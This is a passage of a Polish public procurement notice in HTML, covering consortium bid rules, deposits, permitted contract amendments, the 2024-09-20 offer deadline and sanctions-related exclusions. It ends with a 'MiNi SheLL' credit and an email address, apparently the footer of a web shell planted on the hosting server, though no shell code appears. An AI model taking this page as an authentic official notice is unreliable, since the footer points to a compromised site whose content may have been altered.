oświadczenie (Formularz 3.5), z którego wynika, które usługi wykonają poszczególni Wykonawcy. <br/>6. Dopuszcza się, aby wadium zostało wniesione przez pełnomocnika (lidera) lub jeden <br/>z podmiotów wspólnie ubiegających się o udzielenie zamówienia, przy czym jeżeli wadium zostanie wniesione w formie innej niż pieniądz, z treści dokumentu wadium musi wynikać, iż zabezpiecza ono ofertę złożoną przez wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>7. Wszelka korespondencja dokonywana będzie wyłącznie z pełnomocnikiem Wykonawców wspólnie ubiegających się o udzielenie zamówienia. <br/>8. W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców są oni zobowiązani na wezwanie Zamawiającego złożyć środki dowodowe, o których mowa w pkt. 9.6 IDW, przy czym:<br/>1) środki dowodowe o których mowa w pkt. 9.6.2 IDW składa odpowiednio Wykonawca, który wykazuje spełnianie warunku, w zakresie i na zasadach opisanych w pkt. 7.2 IDW;<br/>2) środki dowodowe o których mowa w pkt. 9.6.1 IDW składa każdy z nich. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Zmiany postanowień zawartej umowy możliwe są jedynie w trybie art. 455 ustawy Pzp. Zmiana Umowy może nastąpić<br/>jedynie na piśmie w formie aneksu pod rygorem nieważności.<br/>2. Przesłanki i zakres zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano<br/>wyboru Wykonawcy, zawarto w Proponowanych Postanowieniach Umowy w sprawie zamówienia publicznego (Tom II<br/>SWZ).<br/>3. Dokonanie zmiany umowy w zakresie podanym powyżej wymaga uprzedniego złożenia na piśmie wniosku Wykonawcy<br/>wykazującego zasadność wprowadzenia zmian i zgody Zamawiającego na jej dokonanie lub przedłożenie propozycji zmiany<br/>przez Zamawiającego. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-09-20 08:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę składa się za pośrednictwem zakładki „Oferty/wnioski”, widocznej w podglądzie postępowania po zalogowaniu się na konto Wykonawcy. Sposób złożenia oferty opisany został w pkt. 12.2 IDW oraz w pkt. 17 IDW.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-09-20 08:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-10-19</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Z postępowania o udzielenie zamówienia wyklucza się Wykonawcę w stosunku do którego zachodzi którakolwiek z<br/>okoliczności wskazanych w art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 roku o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego na okres trwania<br/>tychże okoliczności (na podstawie art. 22 ustawy z dnia 13 kwietnia 2022 roku o której mowa powyżej).

Creat By MiNi SheLL
Email: jattceo@gmail.com